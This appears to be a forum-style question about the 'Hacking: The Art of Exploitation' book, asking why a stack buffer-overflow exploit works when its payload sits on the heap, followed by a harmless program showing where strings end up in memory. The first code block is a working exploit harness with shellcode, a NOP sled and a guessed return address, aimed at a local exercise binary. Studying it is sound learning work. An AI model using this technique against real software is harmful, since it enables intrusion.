I have recently been reading Hacking: The Art of Exploitation, but I am stuck on this piece of code.
```c
#include <stdlib.h>   /* malloc, free, atoi, system */
#include <string.h>   /* memset, strcpy, strlen, memcpy, strcat */

/* Book's shellcode: prints "hello hacking world\n" and exits. */
const char shellcode[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x14\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x68\x61\x63\x6b\x69\x6e\x67\x20\x77\x6f\x72\x6c\x64\x0a";

int main(int argc, char **argv) {
    /* Pointer-to-unsigned-int casts assume the 32-bit process used in the book. */
    unsigned int i, *ptr, ret, offset = 377;
    char *command, *buffer;

    /* Build the command line for the target program on the heap. */
    command = (char *)malloc(200);
    memset(command, 0, 200);
    strcpy(command, "./overflow_shellcode \'");
    buffer = command + strlen(command);   /* payload starts after the opening quote */

    if (argc > 1)
        offset = atoi(argv[1]);
    ret = (unsigned int)&i - offset;      /* guessed address, relative to this frame's `i` */

    /* Fill 160 bytes with the guessed address, then overwrite the first 60 with NOPs
       and place the shellcode right after the NOP sled. */
    for (i = 0; i < 160; i += 4)
        *((unsigned int *)(buffer + i)) = ret;
    memset(buffer, 0x90, 60);
    memcpy(buffer + 60, shellcode, sizeof(shellcode) - 1);

    strcat(command, "\'");                /* closing quote */
    system(command);                      /* run the target with the payload as its argument */
    free(command);
    return 0;
}
```
What I don't understand is this: the shellcode is on the heap, and `ret` is for overwriting the return address. But `i` is on the stack, so `rip` will point to the return address and won't point to the heap. Am I right? But my test tells me that the shellcode is executed. Why?
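The following is an added example, not code from the book or from the question above. It shows where a string ends up depending on how a process receives it: a copy made into a local buffer (as a `strcpy()` target in the invoked program would do) sits next to the other locals of that frame, a `malloc()`ed copy does not, and on Linux the `argv` strings of a freshly `execve()`d process are placed in that process's own address space, not in the parent's heap. The 1 MiB "same region" window and the function names are assumptions made for this illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Heuristic for this illustration: two addresses closer than 1 MiB are treated
 * as belonging to the same region. This is not an OS guarantee. */
#define SAME_REGION_WINDOW (1u << 20)

static int within_window(const void *a, const void *b) {
    uintptr_t x = (uintptr_t)a, y = (uintptr_t)b;
    uintptr_t d = x > y ? x - y : y - x;
    return d < SAME_REGION_WINDOW;
}

/* Copy src into a local buffer, the way a strcpy() into a stack buffer would,
 * and report whether that copy lies next to another local of the same frame. */
int copy_lands_near_local(const char *src) {
    unsigned int marker = 0;   /* plays the role of `i` in the question's harness */
    char frame_buf[64];        /* the local buffer receiving the string */
    size_t n = strlen(src);
    if (n >= sizeof frame_buf) n = sizeof frame_buf - 1;
    memcpy(frame_buf, src, n);
    frame_buf[n] = '\0';
    return within_window(frame_buf, &marker);
}

/* The same string kept in a malloc()ed block: is it anywhere near the locals? */
int heap_copy_lands_near_local(const char *src) {
    unsigned int marker = 0;
    char *heap_buf = malloc(strlen(src) + 1);
    int near;
    if (heap_buf == NULL) return -1;
    strcpy(heap_buf, src);
    near = within_window(heap_buf, &marker);
    free(heap_buf);
    return near;
}

int main(int argc, char **argv) {
    const char *sample = "constructed sample string";   /* constructed input */
    unsigned int local = 0;
    printf("&local                 = %p\n", (void *)&local);
    /* On Linux, execve() copies the argv strings into the new process's own stack area. */
    if (argc > 1)
        printf("argv[1] near &local?     %d  (%p)\n", within_window(argv[1], &local), (void *)argv[1]);
    printf("heap copy near a local?  %d\n", heap_copy_lands_near_local(sample));
    printf("stack copy near a local? %d\n", copy_lands_near_local(sample));
    return 0;
}
```

Run it once with no argument and once with any argument to see all three cases printed.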